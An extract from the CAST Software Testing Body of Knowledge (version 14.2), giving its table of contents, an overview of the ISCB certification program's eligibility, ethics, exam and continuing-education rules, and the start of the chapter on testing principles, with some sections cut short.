Cast Stbok V14-2
Cast Stbok V14-2
Table of Contents
Introduction to the Software Testing Certification
Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-1
Intro.1.Software Certification Overview . . . . . . . . . . . . . . . . Intro-2
Intro.1.1.Contact Us . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-3
Intro.1.2.Program History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-3
Intro.1.3.Why Become Certified? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-3
Intro.1.4.Benefits of Becoming Certified . . . . . . . . . . . . . . . . . . . . . . . . . Intro-3
Intro.2.Meeting the Certification Qualifications . . . . . . . . . . Intro-7
Intro.2.1.Prerequisites for Candidacy . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-7
Intro.2.2.Code of Ethics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-9
Intro.2.3.Submitting the Initial Application . . . . . . . . . . . . . . . . . . . . . . . Intro-11
Intro.2.4.Application-Examination Eligibility Requirements . . . . . . . . . . Intro-12
Intro.3.Scheduling with Pearson VUE to Take
the Examination . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-13
Intro.3.1.Arriving at the Examination Site . . . . . . . . . . . . . . . . . . . . . . . Intro-13
Intro.4.How to Maintain Competency and
Improve Value . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro-13
Intro.4.1.Continuing Professional Education . . . . . . . . . . . . . . . . . . . . . Intro-14
Intro.4.2.Advanced Software Testing Designations . . . . . . . . . . . . . . . Intro-14
Skill Category 1
Software Testing Principles and Concepts . . . . . 1-1
1.1.Vocabulary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2
1.2.Quality Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2
1.2.1.Quality Assurance Versus Quality Control . . . . . . . . . . . . . . . . . . . . . 1-2
1.2.2.Quality, A Closer Look . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-4
1.2.3.What is Quality Software? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-5
1.2.4.The Cost of Quality . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-8
1.2.5.Software Quality Factors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-11
1.3.Understanding Defects . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-13
1.3.1.Software Process Defects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-14
1.3.2.Software Process and Product Defects . . . . . . . . . . . . . . . . . . . . . . 1-14
1.4.Process and Testing Published Standards . . . . . . . . . . . . 1-15
1.4.1.CMMI® for Development . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-16
1.4.2.TMMiTest Maturity Model integration . . . . . . . . . . . . . . . . . . . . . . 1-17
Version 14.2 1
Software Testing Body of Knowledge
2 Version 14.2
Table of Contents
Skill Category 2
Building the Software Testing Ecosystem . . . . . . 2-1
2.1.Management’s Role . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-1
2.1.1.Setting the Tone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-2
2.1.2.Commitment to Competence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-3
2.1.3.The Organizational Structure Within the Ecosystem . . . . . . . . . . . . . 2-3
2.1.4.Meeting the Challenge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4
2.2.Work Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4
2.2.1.What is a Process? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-5
2.2.2.Components of a Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-5
2.2.3.Tester’s Workbench . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-6
2.2.4.Responsibility for Building Work Processes . . . . . . . . . . . . . . . . . . . 2-8
2.2.5.Continuous Improvement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-9
2.2.6.SDLC Methodologies Impact on the Test Process . . . . . . . . . . . . . 2-11
2.2.7.The Importance of Work Processes . . . . . . . . . . . . . . . . . . . . . . . . 2-12
2.3.Test Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-13
2.3.1.What is the Test Environment? . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-13
2.3.2.Why do We Need a Test Environment? . . . . . . . . . . . . . . . . . . . . . 2-13
2.3.3.Establishing the Test Environment . . . . . . . . . . . . . . . . . . . . . . . . . 2-14
2.3.4.Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-15
2.3.5.Control of the Test Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-16
2.4.Test Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-16
2.4.1.Categories of Test Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-17
2.4.2.Advantages and Disadvantages of Test Automation . . . . . . . . . . . . 2-20
2.4.3.What Should Be Automated . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-21
2.5.Skilled Team . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-22
2.5.1.Types of Skills . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-22
2.5.2.Business Domain Knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-24
2.5.3.Test Competency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-25
Skill Category 3
Managing the Test Project . . . . . . . . . . . . . . . . . . . 3-1
3.1.Test Administration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-1
3.1.1.Test Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-2
3.1.2.Estimation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-2
3.1.3.Developing a Budget for Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-3
3.1.4.Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4
3.1.5.Resourcing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5
3.2.Test Supervision . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5
Version 14.2 3
Software Testing Body of Knowledge
Skill Category 4
Risk in the Software Development Life Cycle . . .4-1
4.1.Risk Concepts and Vocabulary . . . . . . . . . . . . . . . . . . . . . . 4-1
4.1.1.Risk Categories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4-2
4.1.2.Risk Vocabulary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4-3
Skill Category 5
Test Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-1
5.1.The Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-1
5.1.1.Advantages to Utilizing a Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . .5-2
5.1.2.The Test Plan as a Contract and a Roadmap . . . . . . . . . . . . . . . . . . .5-2
5.2.Prerequisites to Test Planning . . . . . . . . . . . . . . . . . . . . . . . 5-2
5.2.1.Objectives of Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-3
5.2.2.Acceptance Criteria . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-3
5.2.3.Assumptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-3
5.2.4.Team Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-3
5.2.5.Constraints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-4
5.2.6.Understanding the Characteristics of the Application . . . . . . . . . . . . .5-4
5.3.Hierarchy of Test Plans . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-5
5.4.Create the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-7
5.4.1.Build the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-8
5.4.2.Write the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5-11
5.4.3.Changes to the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-18
5.4.4.Attachments to the Test Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-19
5.5.Executing the Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-19
Skill Category 6
Walkthroughs, Checkpoint Reviews,
and Inspections . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-1
6.1.Purpose of Reviews . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1
6.1.1.Emphasize Quality throughout the SDLC . . . . . . . . . . . . . . . . . . . . . .6-2
6.1.2.Detect Defects When and Where they are Introduced . . . . . . . . . . . .6-2
6.1.3.Opportunity to Involve the End User/Customer . . . . . . . . . . . . . . . . . .6-3
6.1.4.Permit “Midcourse” Corrections . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3
6.2.Review Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-4
4 Version 14.2
Table of Contents
Skill Category 7
Designing Test Cases . . . . . . . . . . . . . . . . . . . . . . 7-1
7.1.Identifying Test Conditions . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1
7.1.1.Defining Test Conditions from Specifications . . . . . . . . . . . . . . . . . . 7-2
7.1.2.Defining Test Conditions from the Production Environment . . . . . . . 7-3
7.1.3.Defining Test Conditions from Test Transaction Types . . . . . . . . . . . 7-4
7.1.4.Defining Test Conditions from Business Case Analysis . . . . . . . . . 7-21
7.1.5.Defining Test Conditions from Structural Analysis . . . . . . . . . . . . . . 7-22
7.2.Test Conditions from Use Cases . . . . . . . . . . . . . . . . . . . . 7-22
7.2.1.What is a Use Case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-22
7.2.2.How Use Cases are Created . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-26
7.2.3.Use Case Format . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-28
7.2.4.How Use Cases are Applied . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-30
7.2.5.Develop Test Cases from Use Cases . . . . . . . . . . . . . . . . . . . . . . . 7-30
7.3.Test Conditions from User Stories . . . . . . . . . . . . . . . . . . . 7-31
7.3.1.INVEST in User Stories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-32
7.3.2.Acceptance Criteria and User Stories . . . . . . . . . . . . . . . . . . . . . . . 7-33
7.3.3.Acceptance Criteria, Acceptance Tests, and User Stories . . . . . . . 7-33
7.3.4.User Stories Provide a Perspective . . . . . . . . . . . . . . . . . . . . . . . . . 7-33
7.3.5.Create Test Cases from User Stories . . . . . . . . . . . . . . . . . . . . . . . 7-33
7.4.Test Design Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-34
7.4.1.Structural Test Design Techniques . . . . . . . . . . . . . . . . . . . . . . . . . 7-35
7.4.2.Functional Test Design Techniques . . . . . . . . . . . . . . . . . . . . . . . . 7-41
7.4.3.Experience-based Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-47
7.4.4.Non-Functional Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-48
7.5.Building Test Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-50
7.5.1.Process for Building Test Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-50
7.5.2.Documenting the Test Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-51
7.6.Test Coverage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-53
Version 14.2 5
Software Testing Body of Knowledge
Skill Category 8
Executing the Test Process . . . . . . . . . . . . . . . . . .8-1
8.1.Acceptance Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-1
8.1.1.Fitness for Use . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-2
8.2.IEEE Test Procedure Specification . . . . . . . . . . . . . . . . . . . 8-2
8.3.Test Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-3
8.3.1.Test Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-4
8.3.2.Test Cycle Strategy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-4
8.3.3.Test Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-4
8.3.4.Use of Tools in Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-7
8.3.5.Test Documentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-7
8.3.6.Perform Tests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-7
8.3.7.Unit Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-11
8.3.8.Integration Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8-12
8.3.9.System Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-14
8.3.10.User Acceptance Testing (UAT) . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-15
8.3.11.Testing COTS Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-15
8.3.12.Acceptance Test the COTS Software . . . . . . . . . . . . . . . . . . . . . . . 8-16
8.3.13.When is Testing Complete? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-16
8.4.Testing Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-17
8.4.1.Environmental versus Transaction Processing Controls . . . . . . . . . . 8-17
8.4.2.Environmental or General Controls . . . . . . . . . . . . . . . . . . . . . . . . . . 8-17
8.4.3.Transaction Processing Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-18
8.5.Recording Test Results . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-24
8.5.1.Deviation from what should be . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-25
8.5.2.Effect of a Defect . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-27
8.5.3.Defect Cause . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-27
8.5.4.Use of Test Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-28
8.6.Defect Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-28
8.6.1.Defect Naming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-29
Skill Category 9
Measurement, Test Status, and Reporting . . . . . .9-1
9.1.Prerequisites to Test Reporting . . . . . . . . . . . . . . . . . . . . . . 9-1
9.1.1.Define and Collect Test Status Data . . . . . . . . . . . . . . . . . . . . . . . . . .9-2
9.1.2.Define Test Measures and Metrics used in Reporting . . . . . . . . . . . .9-3
9.1.3.Define Effective Test Measures and Metrics . . . . . . . . . . . . . . . . . . . .9-5
6 Version 14.2
Table of Contents
Skill Category 10
Testing Specialized Technologies . . . . . . . . . . . 10-1
10.1.New Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-2
10.1.1.Risks Associated with New Technology . . . . . . . . . . . . . . . . . . . . 10-2
10.1.2.Testing the Effectiveness of Integrating New Technology . . . . . . . 10-3
10.2.Web-Based Applications . . . . . . . . . . . . . . . . . . . . . . . . . . 10-4
10.2.1.Understand the Basic Architecture . . . . . . . . . . . . . . . . . . . . . . . . 10-4
10.2.2.Test Related Concerns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-5
10.2.3.Planning for Web-based Application Testing . . . . . . . . . . . . . . . . . 10-6
10.2.4.Identify Test Conditions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-7
10.3.Mobile Application Testing . . . . . . . . . . . . . . . . . . . . . . . 10-11
10.3.1.Characteristics and Challenges of the Mobile Platform . . . . . . . . 10-11
10.3.2.Identifying Test Conditions on Mobile Apps . . . . . . . . . . . . . . . . . 10-13
10.3.3.Mobile App Test Automation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-16
10.4.Cloud Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-17
10.4.1.Defining the Cloud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-17
10.4.2.Testing in the Cloud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-19
10.4.3.Testing as a Service (TaaS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-19
10.5.Testing in an Agile Environment . . . . . . . . . . . . . . . . . . . 10-20
10.5.1.Agile as an Iterative Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-20
10.5.2.Testers Cannot Rely on having Complete Specifications . . . . . . 10-20
10.5.3.Agile Testers must be Flexible . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-20
10.5.4.Key Concepts for Agile Testing . . . . . . . . . . . . . . . . . . . . . . . . . . 10-20
10.5.5.Traditional vs. Agile Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-21
10.5.6.Agile Testing Success Factors . . . . . . . . . . . . . . . . . . . . . . . . . . 10-22
10.6.DevOps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-22
10.6.1.DevOps Continuous Integration . . . . . . . . . . . . . . . . . . . . . . . . . . 10-23
10.6.2.DevOps Lifecycle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-23
10.6.3.Testers Role in DevOps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-24
10.6.4.DevOps and Test Automation . . . . . . . . . . . . . . . . . . . . . . . . . . . 10-24
Version 14.2 7
Software Testing Body of Knowledge
Appendix A
Vocabulary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A-1
Appendix B
Test Plan Example . . . . . . . . . . . . . . . . . . . . . . . . . B-1
Appendix C
Test Transaction Types Checklists . . . . . . . . . . . C-1
C.1.Field Transaction Types Checklist . . . . . . . . . . . . . . . . . . . C-2
C.2.Records Testing Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . C-4
C.3.File Testing Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C-5
C.4.Relationship Conditions Checklist . . . . . . . . . . . . . . . . . . . C-6
C.5.Error Conditions Testing Checklist . . . . . . . . . . . . . . . . . . C-8
C.6.Use of Output Conditions Checklist . . . . . . . . . . . . . . . . . C-10
C.7.Search Conditions Checklist . . . . . . . . . . . . . . . . . . . . . . . C-11
C.8.Merging/Matching Conditions Checklist . . . . . . . . . . . . . C-12
C.9.Stress Conditions Checklist . . . . . . . . . . . . . . . . . . . . . . . C-14
C.10.Control Conditions Checklist . . . . . . . . . . . . . . . . . . . . . C-15
C.11.Attributes Conditions Checklist . . . . . . . . . . . . . . . . . . . C-18
C.12.Stress Conditions Checklist . . . . . . . . . . . . . . . . . . . . . . C-20
C.13.Procedures Conditions Checklist . . . . . . . . . . . . . . . . . . C-21
Appendix D
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D-1
8 Version 14.2
Introduction to the Software Testing Certification Program
Introduction to the
Software Testing Certification
Program
T
he Software Testing Certification program (CAST, CSTE, and CMST) was developed
by leading software testing professionals as a means of recognizing software testers
who demonstrate a predefined level of testing competency. The Software Testing
Certification program is directed by the International Software Certification Board
(ISCB), an independent Board and administered by the QAI Global Institute (QAI). The
program was developed to provide value to the profession, the individual, the employer, and
co-workers.
The CAST, CSTE, and CMST certifications test the level of competence in the principles and
practices of testing and control in the Information Technology (IT) profession. These
principles and practices are defined by the ISCB as the Software Testing Body of Knowledge
(STBOK). The ISCB will periodically update the STBOK to reflect changing software testing
and control, as well as changes in computer technology. These updates should occur
approximately every three years.
Be sure to check the Software Certifications Web site for up-to-date information
on the Software Testing Certification program at:
www.softwarecertifications.org
Using this product does not constitute, nor imply, the successful passing of the
certification examination.
The Software Testing Certification programs demonstrate the following objectives to establish
standards for initial qualification and continuing improvement of professional competence.
The certification programs help to:
1. Define the tasks (skill categories) associated with software testing duties in order to evalu-
ate skill mastery.
2. Demonstrate an individual’s willingness to improve professionally.
3. Acknowledge attainment of an acceptable standard of professional competency.
4. Aid organizations in selecting and promoting qualified individuals.
5. Motivate personnel having software testing responsibilities to maintain their professional
competency.
6. Assist individuals in improving and enhancing their organization’s software testing pro-
grams (i.e., provide a mechanism to lead a professional).
In addition to Software Testing Certification, the ISCB also offer the following software
certifications.
Software Testers
• Certified Associate in Software Testing (CAST)
• Certified Software Tester (CSTE)
• Certified Manager of Software Testing (CMST)
Intro.1.1 Contact Us
Software Certifications
Phone: (407)-472-8100
Fax: (407)-363-1112
Software testing is often viewed as a software project task, even though many individuals are
full-time testing professionals. The Software Testing Certification program was designed to
recognize software testing professionals by providing:
• Code of Ethics
The successful candidate must agree to abide by a professional Code of Ethics as specified
by the ISCB. See “Code of Ethics” on page 9 for an explanation of the ethical behaviors
expected of all certified professionals.
The individual obtaining the CSTE certification receives the following values:
• Recognition by Peers of Personal Desire to Improve
Approximately seventy-five percent (75%) of all CSTEs stated that a personal desire for
self-improvement and peer recognition was the main reason for obtaining the CSTE
certification. Fifteen percent (15%) were required by their employer to sit for the
examination, and ten percent (10%) were preparing themselves for an improved testing-
related position.
Many CSTEs indicated that while their employer did not require CSTE certification, it
was strongly encouraged.
• Increased Confidence in Personal Capabilities
Eighty-five percent (85%) of the CSTEs stated that passing the examination increased
their confidence to perform their job more effectively. Much of that confidence came from
studying for the examination.
• Recognition by IT Management for Professional Achievement
Most CSTEs stated that their management greatly respects those who put forth the
personal effort needed for self-improvement. IT organizations recognized and rewarded
individuals in the following ways:
• Thirteen percent (13%) received an immediate average one-time bonus of $610, with a
range of $250 to $2,500.
• Twelve percent (12%) received an immediate average salary increase of 10%, with a
range of 2% to 50%.
With the need for increased software testing and reliability, companies employing certified
testers provide value in these ways:
Certified Testers use their knowledge and skills to continuously improve the IT work
processes. They know what to measure, how to measure it, and then prepare an analysis to aid
in the decision-making process.
The Software Testing Certification program is directed by the ISCB. Through examination
and recertification, they provide an independent assessment of one’s testing competencies,
based on a continuously strengthening Software Testing Body of Knowledge.
From an IT director’s perspective, this is employee-initiated testing training. Most, if not all
testers, do this training during their personal time. IT organizations gain three benefits from
recertification: 1) employees initiate improvement; 2) testing practitioners obtain
competencies in testing methods and techniques; and 3) employees train during personal time.
The drive for self-improvement is a special trait that manifests itself in providing these values
to co-workers:
Forty-five percent (45%) of the CSTEs mentor their testing colleagues by conducting training
classes, encouraging staff to become certified, and acting as a resource to the staff on sources
of IT testing-related information.
CSTEs and CMSTs are recognized as experts in testing and are used heavily for advice,
counseling, and for recommendations on software construction and testing.
CSTEs and CMSTs are the IT role models for individuals with testing responsibilities to
become more effective in performing their job responsibilities.
Intro.2.1.1.1 CAST
To qualify for candidacy, each applicant must meet one of the “rule of 3’s” credentials listed
below:
Intro.2.1.1.2 CSTE
To qualify for candidacy, each applicant must meet one of the “rule of 6’s” credentials listed
below:
1. A four year degree from an accredited college-level institution and two years of experi-
ence in the information services field.
2. A three year degree from an accredited college-level institution and three years of experi-
ence in the information services field.
3. A two year degree from an accredited college-level institution and four years of experi-
ence in the information services field.
4. Six years of experience in the information services field.
Intro.2.1.1.3 CMST
To qualify for candidacy, each applicant must meet one of the “rule of 8’s” credentials listed
below:
Knowledge within a profession doesn't stand still. Having passed the certification
examination, a certificant has demonstrated knowledge of the designation's STBOK at the
point in time of the examination. In order to stay current in the field, as knowledge and
techniques mature, the certificant must be actively engaged in professional practice, and seek
opportunities to stay aware of, and learn, emerging practices.
The certified tester is required to submit 120 credit hours of Continuing Professional
Education (CPE) every three years to maintain certification or take an examination for
recertification. Any special exceptions to the CPE requirements are to be directed to Software
Certifications. Certified professionals are generally expected to:
• Attend professional conferences to stay aware of activities and trends in the
profession.
• Take education and training courses to continually update skills and competencies.
• Develop and offer training to share knowledge and skills with other professionals and
the public.
• Publish information in order to disseminate personal, project, and research
experiences.
• Participate in the profession through active committee memberships and formal
special interest groups.
The certified tester is expected not only to possess the skills required to pass the certification
examination but also to be a change agent: someone who can change the culture and work
habits of individuals (or someone who can act in an advisory position to upper management)
to make quality in software testing happen.
In preparing yourself for the profession of IT software testing and to become more effective in
your current job, you need to become aware of the three C’s of today's workplace:
• Change – The speed of change in technology and in the way work is performed is
accelerating. Without continuous skill improvement, you will become obsolete in the
marketplace.
• Complexity – Information technology is becoming more complex, not less complex.
Thus, achieving quality, with regard to software testing in the information technology
environment, will become more complex. You must update your skill proficiency in
order to deal with this increased complexity.
• Competition – The ability to demonstrate mastery of multiple skills makes you a more
desirable candidate for any professional position. While hard work does not guarantee
your success, few, if any, achieve success without hard work. A software testing
certification is one form of achievement. A software testing certification is proof that
you’ve mastered a basic skill set recognized worldwide in the information technology
arena.
Become a lifelong learner in order to perform your current job effectively and remain
marketable in an era of the three C’s. You cannot rely on your current knowledge to meet
tomorrow's job demands. The responsibility for success lies within your own control.
Perhaps the most important single thing you can do to improve yourself
professionally and personally is to develop a lifetime learning habit.
Intro.2.2.1 Purpose
Intro.2.2.2 Responsibility
This Code of Ethics is applicable to all certified by the ISCB. Acceptance of any certification
designation is a voluntary action. By acceptance, those certified assume an obligation of self-
discipline beyond the requirements of laws and regulations.
The standards of conduct set forth in this Code of Ethics provide basic principles in the
practice of information services testing. Those certified should realize that their individual
judgment is required in the application of these principles.
Those certified shall use their respective designations with discretion and in a dignified
manner, fully aware of what the designation denotes. The designation shall also be used in a
manner consistent with all statutory requirements.
Those certified who are judged by the ISCB to be in violation of the standards of conduct of
the Code of Ethics shall be subject to forfeiture of their designation.
10. In the practice of their profession, shall be ever mindful of their obligation to maintain the
high standards of competence, morality, and dignity promulgated by this Code of Ethics.
11. Maintain and improve their professional competency through continuing education.
12. Cooperate in the development and interchange of knowledge for mutual professional ben-
efit.
13. Maintain high personal standards of moral responsibility, character, and business integrity.
The entire STBOK is provided in Skill Category 1 through Skill Category 10. A
comprehensive list of related references is listed in the appendices.
• Current experience in the field covered by the certification designation.
• Significant experience and breadth to have mastered the basics of the entire STBOK.
• Prepared to take the required examination and therefore ready to schedule and take the
examination.
Candidates for certification who rely on only limited experience, or upon too few or specific
study materials, typically do not successfully obtain certification. Many drop out without ever
taking the examination. Fees in this program are nonrefundable.
Do not apply for CSTE or CMST unless you feel confident that your work
activities and past experience have prepared you for the examination process.
Applicants already holding a certification from the ISCB must still submit a new application
when deciding to pursue an additional certification. For example, an applicant already holding
a CSQA or CSBA certification must still complete the application process if pursuing the
CSTE certification.
It is critical that candidates keep their on-line profile up-to-date. Many candidates change their
residence or job situations during their certification candidacy. If any such changes occur, it is
the candidate's responsibility to login to the Software Certification Customer Portal and
update their profile as appropriate.
If the examination is taken inside that 12-month period, then another year is added to the
original application length and two more attempts, if required. Candidates for certification
must pass a two-part examination in order to obtain certification. The examination tests the
candidate's knowledge and practice of the competency areas defined in the STBOK.
Candidates who do not successfully pass the examination may re-take the examination up to
two times by logging into the Software Certification’s Customer Portal and selecting the
retake option and paying all required fees.
Technical knowledge becomes obsolete quickly; therefore the board has established these
eligibility guidelines. The goal is to test on a consistent and comparable knowledge base
worldwide. The eligibility requirements have been developed to encourage candidates to
prepare and pass all portions of the examination in the shortest time possible.
Intro.3.1.1 No-shows
Candidates who fail to appear for a scheduled examination – initial or retake – are marked as
NO SHOW and must submit an on-line Examination Re-sit request to apply for a new
examination date. If a candidate needs to change the date and/or time of their certification
exam, they must log in directly to the Pearson VUE site to request the change. All changes
must be made 24 hours before the scheduled exam or a re-sit fee will be required.
You should develop an annual plan to improve your personal competencies. Getting 120 hours
of continuing professional education will enable you to recertify your Software Testing
designation.
The drivers for improving performance in IT are the quality assurance and quality control
(testing) professionals. Dr. W. Edward Deming recognized this “do-check” partnership of
quality professionals in his “14 points” as the primary means for implementing the change
needed to mature. Quality control identifies the impediments to quality and quality assurance
facilitates the fix. Listed below is the certification level, emphasis of each certification, and
how you can demonstrate that competency.
• CAST
Demonstrate competency in knowing what to do.
Study for, and pass, a one-part examination designed to evaluate the candidate’s
knowledge of the principles and concepts incorporated into the STBOK.
• CSTE
Demonstrate competency in knowing what to do and how to do it.
Study for, and pass, a two-part examination designed to evaluate the candidate’s
knowledge of the principles and concepts incorporated into the STBOK, plus the ability to
relate those principles and concepts to the challenges faced by IT organizations.
• CMST
Demonstrate competency in knowing how to solve management level challenges.
Candidates must demonstrate their ability to develop real solutions to challenges in their
IT organizations, by proposing a solution to a real-world management problem.
Skill
Category
1
Category
Software Testing
Principles and Concepts
T
he “basics” of software testing are represented by the vocabulary of testing, testing
approaches, methods and techniques, as well as, the materials used by testers in
performing their test activities.
Vocabulary 1-2
Quality Basics 1-2
Understanding Defects 1-14
Process and Testing Published Standards 1-15
Software Testing 1-17
Software Development Life Cycle (SDLC) 1-28
Models
Agile Development Methodologies 1-42
Testing Throughout the Software 1-46
Development Life Cycle (SDLC)
Testing Schools of Thought and Testing 1-52
Approaches
Test Categories and Testing Techniques 1-55
